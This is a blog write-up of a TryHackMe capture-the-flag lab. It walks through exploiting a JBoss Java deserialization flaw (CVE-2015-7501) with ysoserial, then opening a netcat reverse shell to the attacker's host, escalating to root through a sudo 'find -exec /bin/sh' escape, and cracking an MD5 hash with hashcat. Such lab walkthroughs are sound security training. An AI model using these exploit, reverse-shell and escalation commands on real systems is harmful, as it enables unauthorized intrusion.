CatSec.org

Tony the Tiger

In this post, we will look into the room “Tony the Tigers” from TryHackMe, which can be found on https://tryhackme.com

This is an exploit on a message serialization vulnerability CVE-2015–7501, which allows code execution when desserializing messages.

So what we’ll do is try to execute some netcat reverse shell on the host to gain access and then rooting it.

Task 1 Deploy

Deploy the machine

Task 2 Intro

All answers are on the introduction paragraph so kindly written by the author of the room, figure it out!

Task 3 Recon

We can NMAP the host to check for open ports

nmap -sC -sV -oN nmap {IP}

Notice that the question explicitly asks for the 8080 port and in my case, it took a little longer to initialize, when comparing to the other open ports. Keep it in mind that if it returns closed, you might want to rerun the command.

>PORTSTATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)|   2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)|   256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)|_  256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)

80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))|_http-generator: Hugo 0.66.0|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: Tony's Blog

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1| http-methods: |_  Potentially risky methods: PUT DELETE TRACE|_http-server-header: Apache-Coyote/1.1|_http-title: Welcome to JBoss ASService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There we have it, so the SSH is open and there are two http servers running.

To answer the questions, we have:

  • Service on 8080: Apache Tomcat/Coyote JSP engine 1.1
  • Name of front-end application on 8080: JBoss

Task 4 Tony’s Flag

It took me quite some time to figure out what to do to get this flag, since I’m quite new to cybersecurity and all but hear that, we have to analyse the images.

See the Tony the Tiger image on a blue background ? download it

So the first thing you read on the Steganography topic is to run Strings 

strings tony.jpg

There it is!!

Task 5 Exploit!

The room author kindly provides us the python script for exploiting on the vulnerability, let’s take a look.

Basically, we will run a POST request with a certain payload that exploits the Java vulnerability and executes our Linux command.

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])

This utilizes the .jar file in order to create the executable payload with our command.

Then we call a post request with the payload

r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)

Reverse Shell

Now we can reverse shell this machine to gain access:

On a terminal, run 

nc -lvnp 8888

On another terminal, run 

python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"

our first terminal has access to the host terminal. For stability, spawn a TTY terminal by running:

python -c 'import pty; pty.spawn("/bin/bash")'

Task 6 Find User JBoss` flag

Now that we have access, check which user are we by running whoami.

As you can see, we are not JBoss.

Navigate to /home/jboss and ls -la to check for files.

cat note

Here we can chill and read the discussion between the two users and a new password for JBOSS user.

Access SSH on jboss:password 

ssh jboss@{IP}

Navigate to /home/jboss and ls -la again.

cat the .jboss file to read the flag.

Task 7 Escalation!

We can always enumerate by utilizing a linEnum or linPeas but I always enjoy misconfigurations on SUID so let’s run

sudo -l

As we can see, the JBoss user is allowed to run /usr/bin/find as ROOT, maybe we can figure out a way to escape to shell from this command.

A first page search on linux escape to shell find got me here.

and we can now run the escape to shell using find command

sudo find /etc/passwd -exec /bin/sh \;

let’s cat /root/root.txt

and we get a flag………………………

but it’s clearly not the answer expected on THM.

It’s also not a known hash (hashid command does not identify it)

hashid {HASH}

Since I have a little experience with access tokens for system authentication, I noticed the “==” characters at the end of our flag and I thought well, maybe this is Base64 encoded.

So I went here, decoded it and guess what, hashid now identifies it as a simple MD5.

We can easily crack it with rockyou.txt now

hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt

and there we have it.